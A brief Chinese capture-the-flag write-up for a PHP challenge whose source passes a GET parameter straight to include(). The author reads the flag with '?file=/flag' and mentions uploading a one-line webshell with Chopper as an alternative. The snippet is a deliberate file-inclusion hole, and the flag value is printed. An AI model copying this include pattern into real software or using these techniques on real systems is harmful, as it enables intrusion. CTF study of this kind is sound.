<?php
/**
* Created by PhpStorm.
* User: jinzhao
* Date: 2019/7/9
* Time: 7:07 AM
*/
highlight_file(__FILE__);
if(isset($_GET['file'])) {
$str = $_GET['file'];
include $_GET['file'];
}
点进去后就上面一段PHP代码审计,根据不断的百度翻译各种函数的意思,觉得应该是本地文件包含
看了别人的writeup,一共两种方法
方法一
构造 ?file=/flag
即 http://7e80a547-7234-43fd-9a21-97d1d4a4f174.node4.buuoj.cn:81/?file=/flag
最后
flag{a75f7e3d-6bff-4f52-8fb4-ca41887c20ec}
方法二
上传一句话木马,菜刀链接,明天再写具体的